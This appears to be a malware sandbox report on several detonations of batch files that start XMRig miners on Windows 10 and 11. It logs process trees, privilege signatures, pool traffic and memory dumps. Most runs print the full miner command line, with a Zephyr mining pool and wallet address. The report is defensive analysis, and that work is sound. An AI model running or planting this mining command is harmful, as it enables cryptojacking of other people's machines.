memory/3684-2-0x00000234AF560000-0x00000234AF580000-memory.dmp

memory/3684-3-0x00000234AF580000-0x00000234AF5A0000-memory.dmp

memory/3684-4-0x00000234AF560000-0x00000234AF580000-memory.dmp

memory/3684-5-0x00000234AF580000-0x00000234AF5A0000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted: 2024-10-26 01:45
Reported: 2024-10-26 02:32
Platform: win11-20241007-en
Max time kernel: 299s
Max time network: 302s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (9).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description                  | Indicator | Process                                         | Target
Token: SeLockMemoryPrivilege | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A
Token: SeLockMemoryPrivilege | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process                                         | Target
N/A         | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A

Suspicious use of WriteProcessMemory

Description                     | Indicator | Process                     | Target
PID 3068 wrote to memory of 240 | N/A       | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 3068 wrote to memory of 240 | N/A       | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (9).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
    xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country | Destination         | Domain                       | Proto
US      | 8.8.8.8:53          | us-zephyr.miningocean.org    | udp
US      | 15.204.240.197:5332 | us-zephyr.miningocean.org    | tcp
US      | 8.8.8.8:53          | 8.8.8.8.in-addr.arpa         | udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

memory/240-0-0x0000026904CC0000-0x0000026904CE0000-memory.dmp

memory/240-1-0x0000026904D10000-0x0000026904D30000-memory.dmp

memory/240-2-0x0000026904D30000-0x0000026904D50000-memory.dmp

memory/240-3-0x0000026904D50000-0x0000026904D70000-memory.dmp

memory/240-4-0x0000026904D30000-0x0000026904D50000-memory.dmp

memory/240-5-0x0000026904D50000-0x0000026904D70000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted: 2024-10-26 01:45
Reported: 2024-10-26 02:32
Platform: win11-20241007-en
Max time kernel: 90s
Max time network: 204s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\PUB\WinRing0x64.sys

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\PUB\WinRing0x64.sys

C:\Users\Admin\AppData\Local\Temp\PUB\WinRing0x64.sys
    C:\Users\Admin\AppData\Local\Temp\PUB\WinRing0x64.sys

Network

Files

memory/1572-0-0x0000000000010000-0x0000000000017000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted: 2024-10-26 01:45
Reported: 2024-10-26 02:32
Platform: win10ltsc2021-20241023-en
Max time kernel: 300s
Max time network: 304s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (2).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description                  | Indicator | Process                                         | Target
Token: SeLockMemoryPrivilege | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A
Token: SeLockMemoryPrivilege | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process                                         | Target
N/A         | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A

Suspicious use of WriteProcessMemory

Description                      | Indicator | Process                     | Target
PID 1196 wrote to memory of 3964 | N/A       | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 1196 wrote to memory of 3964 | N/A       | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (2).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
    xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country | Destination         | Domain                       | Proto
US      | 8.8.8.8:53          | us-zephyr.miningocean.org    | udp
US      | 15.204.244.104:5332 | us-zephyr.miningocean.org    | tcp
US      | 8.8.8.8:53          | 136.32.126.40.in-addr.arpa   | udp
US      | 8.8.8.8:53          | 95.221.229.192.in-addr.arpa  | udp
US      | 8.8.8.8:53          | 104.244.204.15.in-addr.arpa  | udp
US      | 8.8.8.8:53          | 56.163.245.4.in-addr.arpa    | udp
US      | 8.8.8.8:53          | 79.190.18.2.in-addr.arpa     | udp
US      | 8.8.8.8:53          | 198.187.3.20.in-addr.arpa    | udp
US      | 8.8.8.8:53          | 172.210.232.199.in-addr.arpa | udp
US      | 8.8.8.8:53          | 31.243.111.52.in-addr.arpa   | udp
US      | 8.8.8.8:53          | 28.173.189.20.in-addr.arpa   | udp
US      | 8.8.8.8:53          | fd.api.iris.microsoft.com    | udp
N/A     | 20.103.156.88:443   |                              | tcp

Files

memory/3964-0-0x0000021282700000-0x0000021282720000-memory.dmp

memory/3964-1-0x0000021282740000-0x0000021282760000-memory.dmp

memory/3964-3-0x0000021282780000-0x00000212827A0000-memory.dmp

memory/3964-2-0x0000021282760000-0x0000021282780000-memory.dmp

memory/3964-5-0x0000021282780000-0x00000212827A0000-memory.dmp

memory/3964-4-0x0000021282760000-0x0000021282780000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted: 2024-10-26 01:45
Reported: 2024-10-26 02:32
Platform: win11-20241007-en
Max time kernel: 214s
Max time network: 282s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (3).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description                  | Indicator | Process                                         | Target
Token: SeLockMemoryPrivilege | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A
Token: SeLockMemoryPrivilege | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process                                         | Target
N/A         | N/A       | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A

Suspicious use of WriteProcessMemory

Description                      | Indicator | Process                     | Target
PID 3492 wrote to memory of 4376 | N/A       | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 3492 wrote to memory of 4376 | N/A       | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (3).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
    xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country | Destination         | Domain                       | Proto
US      | 8.8.8.8:53          | us-zephyr.miningocean.org    | udp
US      | 15.204.240.197:5332 | us-zephyr.miningocean.org    | tcp

Files

memory/4376-0-0x0000021A81BF0000-0x0000021A81C10000-memory.dmp

memory/4376-1-0x0000021B15660000-0x0000021B15680000-memory.dmp

memory/4376-2-0x0000021B15AB0000-0x0000021B15AD0000-memory.dmp

memory/4376-3-0x0000021B15CE0000-0x0000021B15D00000-memory.dmp

memory/4376-4-0x0000021B15AB0000-0x0000021B15AD0000-memory.dmp

memory/4376-5-0x0000021B15CE0000-0x0000021B15D00000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted: 2024-10-26 01:45
Reported: 2024-10-26 02:32
Platform: win10ltsc2021-20241023-en
Max time kernel: 300s
Max time network: 258s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (5).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1752 wrote to memory of 3048 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 1752 wrote to memory of 3048 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (5).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 us-zephyr.miningocean.org udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 15.204.240.197:5332 us-zephyr.miningocean.org tcp
US 8.8.8.8:53 197.240.204.15.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp
N/A 20.74.47.205:443 tcp

Files

memory/3048-0-0x000001AA4A220000-0x000001AA4A240000-memory.dmp

memory/3048-1-0x000001AA4A270000-0x000001AA4A290000-memory.dmp

memory/3048-2-0x000001AA4A290000-0x000001AA4A2B0000-memory.dmp

memory/3048-3-0x000001AA4A2B0000-0x000001AA4A2D0000-memory.dmp

memory/3048-5-0x000001AA4A2B0000-0x000001AA4A2D0000-memory.dmp

memory/3048-4-0x000001AA4A290000-0x000001AA4A2B0000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted: 2024-10-26 01:45
Reported: 2024-10-26 02:32
Platform: win10ltsc2021-20241023-en
Max time kernel: 300s
Max time network: 279s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (6).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3488 wrote to memory of 4348 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 3488 wrote to memory of 4348 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (6).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 us-zephyr.miningocean.org udp
US 15.204.244.104:5332 us-zephyr.miningocean.org tcp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.244.204.15.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 28.173.189.20.in-addr.arpa udp

Files

memory/4348-0-0x0000020BAF2E0000-0x0000020BAF300000-memory.dmp

memory/4348-1-0x0000020BAF330000-0x0000020BAF350000-memory.dmp

memory/4348-3-0x0000020BAF350000-0x0000020BAF370000-memory.dmp

memory/4348-2-0x0000020BAF370000-0x0000020BAF390000-memory.dmp

memory/4348-5-0x0000020BAF350000-0x0000020BAF370000-memory.dmp

memory/4348-4-0x0000020BAF370000-0x0000020BAF390000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted: 2024-10-26 01:45
Reported: 2024-10-26 02:32
Platform: win10ltsc2021-20241023-en
Max time kernel: 300s
Max time network: 308s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (8).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4724 wrote to memory of 3412 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 4724 wrote to memory of 3412 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (8).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 us-zephyr.miningocean.org udp
US 15.204.244.104:5332 us-zephyr.miningocean.org tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 104.244.204.15.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 fd.api.iris.microsoft.com udp

Files

memory/3412-0-0x00000224908E0000-0x0000022490900000-memory.dmp

memory/3412-1-0x0000022490A40000-0x0000022490A60000-memory.dmp

memory/3412-2-0x0000022490A60000-0x0000022490A80000-memory.dmp

memory/3412-3-0x0000022490A80000-0x0000022490AA0000-memory.dmp

memory/3412-4-0x0000022490A60000-0x0000022490A80000-memory.dmp

memory/3412-5-0x0000022490A80000-0x0000022490AA0000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted: 2024-10-26 01:45
Reported: 2024-10-26 02:32
Platform: win11-20241007-en
Max time kernel: 146s
Max time network: 296s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (8).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4172 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 4172 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (8).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 us-zephyr.miningocean.org udp
US 15.204.240.197:5332 us-zephyr.miningocean.org tcp
US 8.8.8.8:53 197.240.204.15.in-addr.arpa udp

Files

memory/2628-0-0x0000028407840000-0x0000028407860000-memory.dmp

memory/2628-1-0x0000028407890000-0x00000284078B0000-memory.dmp

memory/2628-2-0x00000284078B0000-0x00000284078D0000-memory.dmp

memory/2628-3-0x00000284078D0000-0x00000284078F0000-memory.dmp

memory/2628-4-0x00000284078B0000-0x00000284078D0000-memory.dmp

memory/2628-5-0x00000284078D0000-0x00000284078F0000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted: 2024-10-26 01:45
Reported: 2024-10-26 02:32
Platform: win10ltsc2021-20241023-en
Max time kernel: 300s
Max time network: 250s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr.bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2332 wrote to memory of 2384 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 2332 wrote to memory of 2384 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr.bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 us-zephyr.miningocean.org udp
US 15.204.244.104:5332 us-zephyr.miningocean.org tcp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.244.204.15.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

memory/2384-0-0x0000023655280000-0x00000236552A0000-memory.dmp

memory/2384-1-0x00000236552D0000-0x00000236552F0000-memory.dmp

memory/2384-2-0x00000236552F0000-0x0000023655310000-memory.dmp

memory/2384-3-0x0000023655310000-0x0000023655330000-memory.dmp

memory/2384-4-0x00000236552F0000-0x0000023655310000-memory.dmp

memory/2384-5-0x0000023655310000-0x0000023655330000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted: 2024-10-26 01:45
Reported: 2024-10-26 02:32
Platform: win10ltsc2021-20241023-en
Max time kernel: 153s
Max time network: 286s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 fd.api.iris.microsoft.com udp
NL 20.103.156.88:443 fd.api.iris.microsoft.com tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 67.112.168.52.in-addr.arpa udp

Files

memory/1016-0-0x000001DB6B8F0000-0x000001DB6B910000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted: 2024-10-26 01:45
Reported: 2024-10-26 02:32
Platform: win10ltsc2021-20241023-en
Max time kernel: 299s
Max time network: 284s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (4).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4588 wrote to memory of 4940 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 4588 wrote to memory of 4940 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (4).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 us-zephyr.miningocean.org udp
US 15.204.240.197:5332 us-zephyr.miningocean.org tcp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 197.240.204.15.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 168.117.168.52.in-addr.arpa udp

Files

memory/4940-0-0x000001FD887B0000-0x000001FD887D0000-memory.dmp

memory/4940-1-0x000001FD887F0000-0x000001FD88810000-memory.dmp

memory/4940-3-0x000001FD88810000-0x000001FD88830000-memory.dmp

memory/4940-2-0x000001FD88830000-0x000001FD88850000-memory.dmp

memory/4940-4-0x000001FD88830000-0x000001FD88850000-memory.dmp

memory/4940-5-0x000001FD88810000-0x000001FD88830000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted: 2024-10-26 01:45
Reported: 2024-10-26 02:32
Platform: win11-20241007-en
Max time kernel: 91s
Max time network: 278s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (6).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2576 wrote to memory of 4108 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 2576 wrote to memory of 4108 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (6).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 us-zephyr.miningocean.org udp
US 15.204.244.104:5332 us-zephyr.miningocean.org tcp

Files

memory/4108-0-0x0000020363320000-0x0000020363340000-memory.dmp

memory/4108-1-0x0000020364C10000-0x0000020364C30000-memory.dmp

memory/4108-2-0x0000020364D50000-0x0000020364D70000-memory.dmp

memory/4108-3-0x0000020364D70000-0x0000020364D90000-memory.dmp

memory/4108-4-0x0000020364D50000-0x0000020364D70000-memory.dmp

memory/4108-5-0x0000020364D70000-0x0000020364D90000-memory.dmp